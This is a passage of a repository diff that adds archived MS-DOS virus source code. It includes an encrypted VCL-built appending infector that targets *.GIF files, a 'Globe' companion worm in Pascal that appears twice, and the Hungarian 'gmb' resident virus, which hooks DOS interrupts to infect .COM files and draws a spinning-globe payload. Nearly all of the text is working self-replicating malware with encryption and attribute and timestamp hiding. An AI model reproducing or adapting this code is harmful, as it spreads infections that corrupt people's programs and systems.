mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
db 089h,043h,03Bh,054h,0AAh
get_weekday proc near
mov ah,02Ah ; DOS get date function
int 021h
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_weekday endp
data00 db "*.GIF",0
vcl_marker db "[Z10]",0 ; VCL creation marker
note db "Bye Bye Mr.GIF",0
db "You'll never find all the file"
db "s I have infected!",0
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
MSDOS/G-Index/Virus.MSDOS.Unknown.girigat.asm
+1450
View File
File diff suppressed because it is too large Load Diff
MSDOS/G-Index/Virus.MSDOS.Unknown.globe.asm
+106
View File
@@ -0,0 +1,106 @@
Program Worm;
{$M 2048,0,4096}
Uses Dos, Crt;
Var F1 : File;
F2 : File;
O : String;
Parm : String;
P : DirStr;
N : NameStr;
E : ExtStr;
Buf : Array[0..8000] of Byte;
NumRead : Word;
NumWritten : Word;
DirInfo : SearchRec;
ComExist : SearchRec;
Infect : Byte;
Procedure StartOrigExe;
Begin
O := ParamStr(0);
FSplit(O,P,N,E);
O := P+N+'.EXE';
P := '';
For NumRead := 1 To ParamCount Do
P := P + ParamStr(NumRead);
SwapVectors;
Exec(O,P);
SwapVectors;
End;
Procedure InfectExe;
Begin
FindFirst('*.EXE',Archive,DirInfo);
While (DosError = 0) And (Infect <> 0) Do
Begin
FSplit(DirInfo.Name,P,N,E);
O := P+N+'.COM';
FindFirst(O,Hidden,ComExist);
If DosError <> 0 Then
Begin
Assign(F1,O);
Rewrite(F1,1);
BlockWrite(F1,buf,NumRead,NumWritten);
Close(F1);
SetFattr(F1,Hidden);
Dec(Infect);
End;
FindNext(DirInfo);
End;
End;
Procedure Activate;
Var
T1,T2 : Integer;
I : Real;
X , Y : Byte;
Resolution : Integer;
Begin
ClrScr;
I := 0;
T2 := 38;
Randomize;
Repeat
Resolution := 50;
For T1 := 0 to Resolution Do
Begin
X := Abs(40+Round(Sin(I)*T2));
Y := Abs(12-Round(Cos(I)*10));
GotoXY(X,Y);
Write('Û');
I := I + ((Pi*2)/Resolution);
End;
T2 := T2 - 1;
TextColor(Random(14)+1);
Until T2 < 2;
GotoXY(30,12);
TextColor(White);
Write('* The Globe Virus *');
Asm
Mov Ah,8
Int 21h
End;
ClrScr;
End;
Begin
Infect := 3;
Randomize;
Assign(F2,ParamStr(0));
Reset(F2,1);
BlockRead(F2,buf,SizeOf(buf),NumRead);
Close(F2);
InfectExe;
StartOrigExe;
If Random(16) = 0 then Activate;
Halt(DosExitCode);
End.
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/G-Index/Virus.MSDOS.Unknown.globe.pas
+106
View File
@@ -0,0 +1,106 @@
Program Worm;
{$M 2048,0,4096}
Uses Dos, Crt;
Var F1 : File;
F2 : File;
O : String;
Parm : String;
P : DirStr;
N : NameStr;
E : ExtStr;
Buf : Array[0..8000] of Byte;
NumRead : Word;
NumWritten : Word;
DirInfo : SearchRec;
ComExist : SearchRec;
Infect : Byte;
Procedure StartOrigExe;
Begin
O := ParamStr(0);
FSplit(O,P,N,E);
O := P+N+'.EXE';
P := '';
For NumRead := 1 To ParamCount Do
P := P + ParamStr(NumRead);
SwapVectors;
Exec(O,P);
SwapVectors;
End;
Procedure InfectExe;
Begin
FindFirst('*.EXE',Archive,DirInfo);
While (DosError = 0) And (Infect <> 0) Do
Begin
FSplit(DirInfo.Name,P,N,E);
O := P+N+'.COM';
FindFirst(O,Hidden,ComExist);
If DosError <> 0 Then
Begin
Assign(F1,O);
Rewrite(F1,1);
BlockWrite(F1,buf,NumRead,NumWritten);
Close(F1);
SetFattr(F1,Hidden);
Dec(Infect);
End;
FindNext(DirInfo);
End;
End;
Procedure Activate;
Var
T1,T2 : Integer;
I : Real;
X , Y : Byte;
Resolution : Integer;
Begin
ClrScr;
I := 0;
T2 := 38;
Randomize;
Repeat
Resolution := 50;
For T1 := 0 to Resolution Do
Begin
X := Abs(40+Round(Sin(I)*T2));
Y := Abs(12-Round(Cos(I)*10));
GotoXY(X,Y);
Write('Û');
I := I + ((Pi*2)/Resolution);
End;
T2 := T2 - 1;
TextColor(Random(14)+1);
Until T2 < 2;
GotoXY(30,12);
TextColor(White);
Write('* The Globe Virus *');
Asm
Mov Ah,8
Int 21h
End;
ClrScr;
End;
Begin
Infect := 3;
Randomize;
Assign(F2,ParamStr(0));
Reset(F2,1);
BlockRead(F2,buf,SizeOf(buf),NumRead);
Close(F2);
InfectExe;
StartOrigExe;
If Random(16) = 0 then Activate;
Halt(DosExitCode);
End.
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/G-Index/Virus.MSDOS.Unknown.gmb.asm
+895
View File
@@ -0,0 +1,895 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
